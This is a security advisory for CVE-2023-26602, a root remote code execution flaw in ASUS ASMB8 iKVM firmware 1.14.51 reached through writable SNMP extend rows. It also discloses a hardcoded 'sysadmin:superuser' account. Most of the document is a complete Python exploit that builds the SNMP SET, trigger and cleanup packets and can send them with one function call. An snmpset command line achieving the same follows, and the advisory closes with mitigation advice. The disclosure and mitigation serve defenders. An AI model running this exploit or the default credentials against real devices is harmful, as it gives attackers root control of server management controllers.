vendor: ASUS
by: d1g@segfault.net
CVSS: 8.1 (listed severity: CRITICAL; note that 8.1 falls in the High band of the CVSS v3 qualitative scale)
Type: Remote Code Execution (RCE) & SSH Access
CWE: CWE-94 (Improper Control of Generation of Code, 'Code Injection')
Product Name: ASMB8 iKVM
Affected Versions: ASMB8 iKVM Firmware <= 1.14.51 (1.14.51 inclusive; earlier versions possibly affected)
Patch Exists: NO
Related CVE: CVE-2023-26602
CPE: h:asus:asmb8_ikvm_firmware:1.14.51
Platforms Tested: Linux
Year: 2023
ASUS ASMB8 iKVM 1.14.51 – Remote Code Execution (RCE) & SSH Access
A vulnerability was found in ASUS ASMB8 iKVM firmware version 1.14.51, and possibly other versions, that allows Remote Code Execution (RCE) through arbitrary SNMP extensions: the BMC's snmpd exposes NET-SNMP-EXTEND-MIB, so anyone with SNMP write access (a write community string) can create an extend row that names a shell command, and the agent executes that command as root when the row's output object is read. An attacker can therefore run commands on the system with root privileges and, for example, add a new user to bypass the restrictions the firmware places on SSH logins. Additionally, a hardcoded account 'sysadmin:superuser' was discovered. The vulnerability is tracked as CVE-2023-26602.
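The row-creation sequence described above, as an added example that is not part of the original advisory or the researcher's exploit: a dependency-free Python encoder for the SNMPv2c SET that registers an extend command in nsExtendConfigTable, the GET of nsExtendOutput1Line that makes snmpd execute it, and the destroy SET that removes the row. It assumes the agent accepts SNMPv2c writes for a known community string; the community 'private', the token 'evil' and the command line are placeholders chosen here, not values from the advisory. Nothing is transmitted unless send_udp() is called explicitly.

```python
"""Build the SNMPv2c packets behind the NET-SNMP-EXTEND-MIB RCE technique.

Added example, not code from the advisory. A writable Net-SNMP agent lets a
SET create a row in nsExtendConfigTable (command + args + RowStatus); the
agent then runs that command, as the snmpd user (root on the affected BMC),
whenever the row's nsExtendOutput1Line object is read. Encoding is done by
hand so the exact OIDs and BER layout are visible; no network I/O happens
unless send_udp() is called against a device you are authorised to test.
"""
import socket

# NET-SNMP-EXTEND-MIB (1.3.6.1.4.1.8072.1.3.2) table entries and columns
NS_EXTEND_CONFIG_ENTRY = (1, 3, 6, 1, 4, 1, 8072, 1, 3, 2, 2, 1)   # nsExtendConfigEntry
NS_EXTEND_OUTPUT1_ENTRY = (1, 3, 6, 1, 4, 1, 8072, 1, 3, 2, 3, 1)  # nsExtendOutput1Entry
COL_COMMAND, COL_ARGS, COL_STATUS = 2, 3, 21   # nsExtendCommand, nsExtendArgs, nsExtendStatus
COL_OUTPUT1_LINE = 1                           # nsExtendOutput1Line
ROWSTATUS_CREATE_AND_GO, ROWSTATUS_DESTROY = 4, 6

TAG_INTEGER, TAG_OCTET_STRING, TAG_NULL, TAG_OID, TAG_SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30
TAG_GET_REQUEST, TAG_SET_REQUEST = 0xA0, 0xA3  # [0] GetRequest-PDU, [3] SetRequest-PDU
SNMP_VERSION_2C = 1


def ber_len(n):
    """BER length: short form below 128, otherwise 0x8N followed by N length bytes."""
    if n < 0x80:
        return bytes([n])
    out = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(out)]) + out


def tlv(tag, body):
    return bytes([tag]) + ber_len(len(body)) + body


def ber_int(v):
    """Non-negative INTEGER in minimal two's-complement form (leading 0x00 if high bit set)."""
    if v < 0:
        raise ValueError("only non-negative integers are needed here")
    return tlv(TAG_INTEGER, v.to_bytes(v.bit_length() // 8 + 1, "big"))


def ber_str(s):
    return tlv(TAG_OCTET_STRING, s.encode())


def ber_oid(arcs):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128 big-endian."""
    body = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        body.extend(chunk)
    return tlv(TAG_OID, bytes(body))


def extend_oid(entry, column, token):
    """Instance OID for nsExtend*."token": the string index is length-prefixed."""
    return entry + (column,) + (len(token),) + tuple(token.encode())


def snmp_message(pdu_tag, community, varbinds, request_id=1):
    """SNMPv2c Message { version, community, PDU { req-id, 0, 0, VarBindList } }."""
    vbl = b"".join(tlv(TAG_SEQUENCE, ber_oid(oid) + value) for oid, value in varbinds)
    pdu = ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(TAG_SEQUENCE, vbl)
    return tlv(TAG_SEQUENCE, ber_int(SNMP_VERSION_2C) + ber_str(community) + tlv(pdu_tag, pdu))


def extend_set_request(community, token, command, args):
    """The SET that registers <command> <args> under nsExtend*."token" (createAndGo)."""
    return snmp_message(TAG_SET_REQUEST, community, [
        (extend_oid(NS_EXTEND_CONFIG_ENTRY, COL_STATUS, token), ber_int(ROWSTATUS_CREATE_AND_GO)),
        (extend_oid(NS_EXTEND_CONFIG_ENTRY, COL_COMMAND, token), ber_str(command)),
        (extend_oid(NS_EXTEND_CONFIG_ENTRY, COL_ARGS, token), ber_str(args)),
    ])


def extend_trigger_request(community, token):
    """Reading nsExtendOutput1Line."token" is what makes snmpd execute the row."""
    return snmp_message(TAG_GET_REQUEST, community,
                        [(extend_oid(NS_EXTEND_OUTPUT1_ENTRY, COL_OUTPUT1_LINE, token), tlv(TAG_NULL, b""))])


def extend_destroy_request(community, token):
    """Cleanup: RowStatus destroy(6) removes the row again."""
    return snmp_message(TAG_SET_REQUEST, community,
                        [(extend_oid(NS_EXTEND_CONFIG_ENTRY, COL_STATUS, token), ber_int(ROWSTATUS_DESTROY))])


def send_udp(host, packet, port=161, timeout=3.0):
    """Explicit opt-in transport; returns the agent's raw response bytes."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(packet, (host, port))
        return sock.recv(4096)


if __name__ == "__main__":
    # Placeholder community, token and command (assumptions, not values from the advisory).
    pkt = extend_set_request("private", "evil", "/bin/sh", "-c 'id > /tmp/snmp_rce'")
    print(pkt.hex())
    print(extend_trigger_request("private", "evil").hex())
```

The same three varbinds are what `snmpset -v2c -c <community> <host> 'NET-SNMP-EXTEND-MIB::nsExtendStatus."evil"' = createAndGo 'nsExtendCommand."evil"' = /bin/sh 'nsExtendArgs."evil"' = '-c ...'` produces; a read of `nsExtendOutput1Line."evil"` then returns the command's first output line, which is also the simplest way to confirm whether a BMC you own still accepts SNMP writes.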
Mitigation:
No fixed firmware is listed for this issue (Patch Exists: NO); if ASUS publishes a release newer than 1.14.51 that addresses it, update to that. Until then: disable SNMP on the BMC, or at minimum SNMPv2c and any write community, since the extension mechanism requires SNMP write access; change default credentials, including the sysadmin account where the firmware allows it; and keep the BMC management interface on a dedicated management network that untrusted hosts cannot reach.